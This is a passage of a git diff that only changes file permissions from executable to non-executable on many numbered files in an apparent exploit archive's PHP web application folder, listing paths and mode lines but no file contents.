a/platforms/php/webapps/8683.txt b/platforms/php/webapps/8683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8684.txt b/platforms/php/webapps/8684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8685.txt b/platforms/php/webapps/8685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8686.txt b/platforms/php/webapps/8686.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8687.txt b/platforms/php/webapps/8687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8688.txt b/platforms/php/webapps/8688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8689.txt b/platforms/php/webapps/8689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8690.txt b/platforms/php/webapps/8690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8691.txt b/platforms/php/webapps/8691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8692.txt b/platforms/php/webapps/8692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8694.txt b/platforms/php/webapps/8694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8697.txt b/platforms/php/webapps/8697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8699.php b/platforms/php/webapps/8699.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/870.txt b/platforms/php/webapps/870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8700.txt b/platforms/php/webapps/8700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8702.txt b/platforms/php/webapps/8702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8707.txt b/platforms/php/webapps/8707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8708.txt b/platforms/php/webapps/8708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8709.txt b/platforms/php/webapps/8709.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/871.txt b/platforms/php/webapps/871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8710.txt b/platforms/php/webapps/8710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8711.txt b/platforms/php/webapps/8711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8713.txt b/platforms/php/webapps/8713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8714.txt b/platforms/php/webapps/8714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8715.txt b/platforms/php/webapps/8715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8717.txt b/platforms/php/webapps/8717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8718.txt b/platforms/php/webapps/8718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8724.txt b/platforms/php/webapps/8724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8725.php b/platforms/php/webapps/8725.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8727.txt b/platforms/php/webapps/8727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8728.htm b/platforms/php/webapps/8728.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/873.txt b/platforms/php/webapps/873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8730.txt b/platforms/php/webapps/8730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8731.php b/platforms/php/webapps/8731.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8735.txt b/platforms/php/webapps/8735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8737.txt b/platforms/php/webapps/8737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8738.txt b/platforms/php/webapps/8738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8739.txt b/platforms/php/webapps/8739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8741.txt b/platforms/php/webapps/8741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8743.txt b/platforms/php/webapps/8743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8744.txt b/platforms/php/webapps/8744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8745.txt b/platforms/php/webapps/8745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8746.txt b/platforms/php/webapps/8746.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8747.txt b/platforms/php/webapps/8747.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8748.txt b/platforms/php/webapps/8748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8750.txt b/platforms/php/webapps/8750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8751.txt b/platforms/php/webapps/8751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8752.txt b/platforms/php/webapps/8752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8755.txt b/platforms/php/webapps/8755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8759.txt b/platforms/php/webapps/8759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8761.txt b/platforms/php/webapps/8761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8762.txt b/platforms/php/webapps/8762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8763.txt b/platforms/php/webapps/8763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8764.txt b/platforms/php/webapps/8764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8766.txt b/platforms/php/webapps/8766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8769.txt b/platforms/php/webapps/8769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8771.htm b/platforms/php/webapps/8771.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8773.txt b/platforms/php/webapps/8773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8774.htm b/platforms/php/webapps/8774.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8775.txt b/platforms/php/webapps/8775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8776.txt b/platforms/php/webapps/8776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8778.txt b/platforms/php/webapps/8778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8779.txt b/platforms/php/webapps/8779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8781.txt b/platforms/php/webapps/8781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8784.txt b/platforms/php/webapps/8784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8787.txt b/platforms/php/webapps/8787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8788.txt b/platforms/php/webapps/8788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8791.txt b/platforms/php/webapps/8791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8792.txt b/platforms/php/webapps/8792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8793.txt b/platforms/php/webapps/8793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8795.htm b/platforms/php/webapps/8795.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8796.htm b/platforms/php/webapps/8796.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8797.txt b/platforms/php/webapps/8797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8801.txt b/platforms/php/webapps/8801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8802.txt b/platforms/php/webapps/8802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8803.txt b/platforms/php/webapps/8803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8805.txt b/platforms/php/webapps/8805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8807.htm b/platforms/php/webapps/8807.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8808.txt b/platforms/php/webapps/8808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8809.htm b/platforms/php/webapps/8809.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/881.txt b/platforms/php/webapps/881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8810.txt b/platforms/php/webapps/8810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8811.txt b/platforms/php/webapps/8811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8812.txt b/platforms/php/webapps/8812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8813.txt b/platforms/php/webapps/8813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8814.txt b/platforms/php/webapps/8814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8815.txt b/platforms/php/webapps/8815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8816.txt b/platforms/php/webapps/8816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8817.txt b/platforms/php/webapps/8817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8818.txt b/platforms/php/webapps/8818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8819.txt b/platforms/php/webapps/8819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8820.txt b/platforms/php/webapps/8820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8821.txt b/platforms/php/webapps/8821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8823.txt b/platforms/php/webapps/8823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8825.txt b/platforms/php/webapps/8825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8827.txt b/platforms/php/webapps/8827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8828.txt b/platforms/php/webapps/8828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8829.txt b/platforms/php/webapps/8829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8830.txt b/platforms/php/webapps/8830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8831.txt b/platforms/php/webapps/8831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8836.txt b/platforms/php/webapps/8836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8838.txt b/platforms/php/webapps/8838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8839.txt b/platforms/php/webapps/8839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8840.txt b/platforms/php/webapps/8840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8841.txt b/platforms/php/webapps/8841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8844.txt b/platforms/php/webapps/8844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8847.txt b/platforms/php/webapps/8847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8848.txt b/platforms/php/webapps/8848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8850.txt b/platforms/php/webapps/8850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8851.txt b/platforms/php/webapps/8851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8852.txt b/platforms/php/webapps/8852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8853.txt b/platforms/php/webapps/8853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8855.txt b/platforms/php/webapps/8855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8856.txt b/platforms/php/webapps/8856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8857.txt b/platforms/php/webapps/8857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8858.txt b/platforms/php/webapps/8858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8860.txt b/platforms/php/webapps/8860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8864.txt b/platforms/php/webapps/8864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8865.txt b/platforms/php/webapps/8865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8866.php b/platforms/php/webapps/8866.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8868.txt b/platforms/php/webapps/8868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8869.txt b/platforms/php/webapps/8869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8870.txt b/platforms/php/webapps/8870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8871.txt b/platforms/php/webapps/8871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8872.txt b/platforms/php/webapps/8872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8874.txt b/platforms/php/webapps/8874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8876.htm b/platforms/php/webapps/8876.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8877.txt b/platforms/php/webapps/8877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8878.txt b/platforms/php/webapps/8878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8879.htm b/platforms/php/webapps/8879.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8882.txt b/platforms/php/webapps/8882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8883.txt b/platforms/php/webapps/8883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8884.txt b/platforms/php/webapps/8884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8886.txt b/platforms/php/webapps/8886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8891.txt b/platforms/php/webapps/8891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8892.txt b/platforms/php/webapps/8892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8893.txt b/platforms/php/webapps/8893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8894.txt b/platforms/php/webapps/8894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8898.txt b/platforms/php/webapps/8898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8900.txt b/platforms/php/webapps/8900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8901.txt b/platforms/php/webapps/8901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8902.htm b/platforms/php/webapps/8902.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8903.txt b/platforms/php/webapps/8903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8904.txt b/platforms/php/webapps/8904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8905.txt b/platforms/php/webapps/8905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8908.txt b/platforms/php/webapps/8908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8911.txt b/platforms/php/webapps/8911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8912.txt b/platforms/php/webapps/8912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8913.txt b/platforms/php/webapps/8913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8914.txt b/platforms/php/webapps/8914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8917.txt b/platforms/php/webapps/8917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8918.txt b/platforms/php/webapps/8918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8919.txt b/platforms/php/webapps/8919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/892.txt b/platforms/php/webapps/892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8920.txt b/platforms/php/webapps/8920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8923.txt b/platforms/php/webapps/8923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8924.txt b/platforms/php/webapps/8924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8925.txt b/platforms/php/webapps/8925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8926.txt b/platforms/php/webapps/8926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8928.txt b/platforms/php/webapps/8928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8929.txt b/platforms/php/webapps/8929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8931.txt b/platforms/php/webapps/8931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8932.txt b/platforms/php/webapps/8932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8933.php b/platforms/php/webapps/8933.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8935.txt b/platforms/php/webapps/8935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8936.txt b/platforms/php/webapps/8936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8937.txt b/platforms/php/webapps/8937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8941.txt b/platforms/php/webapps/8941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8942.txt b/platforms/php/webapps/8942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8943.txt b/platforms/php/webapps/8943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8944.txt b/platforms/php/webapps/8944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8946.txt b/platforms/php/webapps/8946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8947.txt b/platforms/php/webapps/8947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8948.txt b/platforms/php/webapps/8948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8949.txt b/platforms/php/webapps/8949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8950.txt b/platforms/php/webapps/8950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8951.php b/platforms/php/webapps/8951.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8952.txt b/platforms/php/webapps/8952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8953.txt b/platforms/php/webapps/8953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8954.txt b/platforms/php/webapps/8954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8956.htm b/platforms/php/webapps/8956.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8958.txt b/platforms/php/webapps/8958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8961.txt b/platforms/php/webapps/8961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8962.txt b/platforms/php/webapps/8962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8965.txt b/platforms/php/webapps/8965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8966.txt b/platforms/php/webapps/8966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8967.txt b/platforms/php/webapps/8967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8968.txt b/platforms/php/webapps/8968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/897.cpp b/platforms/php/webapps/897.cpp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8974.txt b/platforms/php/webapps/8974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8975.txt b/platforms/php/webapps/8975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8977.txt b/platforms/php/webapps/8977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8978.txt b/platforms/php/webapps/8978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8979.txt b/platforms/php/webapps/8979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8981.txt b/platforms/php/webapps/8981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8984.txt b/platforms/php/webapps/8984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8988.txt b/platforms/php/webapps/8988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8990.txt b/platforms/php/webapps/8990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8992.php b/platforms/php/webapps/8992.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8993.txt b/platforms/php/webapps/8993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8994.txt b/platforms/php/webapps/8994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8995.txt b/platforms/php/webapps/8995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8996.txt b/platforms/php/webapps/8996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8997.txt b/platforms/php/webapps/8997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8998.txt b/platforms/php/webapps/8998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/8999.txt b/platforms/php/webapps/8999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9000.txt b/platforms/php/webapps/9000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9001.php b/platforms/php/webapps/9001.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9004.txt b/platforms/php/webapps/9004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9008.txt b/platforms/php/webapps/9008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9009.txt b/platforms/php/webapps/9009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9010.txt b/platforms/php/webapps/9010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9011.txt b/platforms/php/webapps/9011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9012.txt b/platforms/php/webapps/9012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9014.txt b/platforms/php/webapps/9014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9015.txt b/platforms/php/webapps/9015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9016.txt b/platforms/php/webapps/9016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9017.txt b/platforms/php/webapps/9017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9018.txt b/platforms/php/webapps/9018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9019.txt b/platforms/php/webapps/9019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9021.txt b/platforms/php/webapps/9021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9022.txt b/platforms/php/webapps/9022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9023.txt b/platforms/php/webapps/9023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9024.txt b/platforms/php/webapps/9024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9025.txt b/platforms/php/webapps/9025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9026.txt b/platforms/php/webapps/9026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9027.txt b/platforms/php/webapps/9027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9028.txt b/platforms/php/webapps/9028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9030.txt b/platforms/php/webapps/9030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9032.txt b/platforms/php/webapps/9032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9035.txt b/platforms/php/webapps/9035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9036.txt b/platforms/php/webapps/9036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9037.txt b/platforms/php/webapps/9037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9040.txt b/platforms/php/webapps/9040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9041.txt b/platforms/php/webapps/9041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9043.txt b/platforms/php/webapps/9043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9044.txt b/platforms/php/webapps/9044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9048.txt b/platforms/php/webapps/9048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9049.txt b/platforms/php/webapps/9049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9051.txt b/platforms/php/webapps/9051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9052.txt b/platforms/php/webapps/9052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9053.txt b/platforms/php/webapps/9053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9054.txt b/platforms/php/webapps/9054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9056.txt b/platforms/php/webapps/9056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9057.txt b/platforms/php/webapps/9057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9059.htm b/platforms/php/webapps/9059.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9062.txt b/platforms/php/webapps/9062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9063.txt b/platforms/php/webapps/9063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9068.txt b/platforms/php/webapps/9068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9069.txt b/platforms/php/webapps/9069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9073.php b/platforms/php/webapps/9073.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9075.txt b/platforms/php/webapps/9075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9076.php b/platforms/php/webapps/9076.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9077.txt b/platforms/php/webapps/9077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9079.txt b/platforms/php/webapps/9079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9080.txt b/platforms/php/webapps/9080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9081.txt b/platforms/php/webapps/9081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9086.txt b/platforms/php/webapps/9086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9087.php b/platforms/php/webapps/9087.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9088.txt b/platforms/php/webapps/9088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9089.txt b/platforms/php/webapps/9089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9091.php b/platforms/php/webapps/9091.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9092.txt b/platforms/php/webapps/9092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9094.txt b/platforms/php/webapps/9094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9095.txt b/platforms/php/webapps/9095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9098.txt b/platforms/php/webapps/9098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9101.txt b/platforms/php/webapps/9101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9103.txt b/platforms/php/webapps/9103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9105.txt b/platforms/php/webapps/9105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9107.txt b/platforms/php/webapps/9107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9109.txt b/platforms/php/webapps/9109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9110.txt b/platforms/php/webapps/9110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9111.txt b/platforms/php/webapps/9111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9112.txt b/platforms/php/webapps/9112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9115.txt b/platforms/php/webapps/9115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9118.txt b/platforms/php/webapps/9118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9119.txt b/platforms/php/webapps/9119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9121.php b/platforms/php/webapps/9121.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9122.txt b/platforms/php/webapps/9122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9125.txt b/platforms/php/webapps/9125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9126.txt b/platforms/php/webapps/9126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9127.txt b/platforms/php/webapps/9127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9129.txt b/platforms/php/webapps/9129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9130.txt b/platforms/php/webapps/9130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9138.txt b/platforms/php/webapps/9138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9144.txt b/platforms/php/webapps/9144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9145.php b/platforms/php/webapps/9145.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9150.txt b/platforms/php/webapps/9150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9151.txt b/platforms/php/webapps/9151.txt old mode 100755 new mode 100644 diff --git 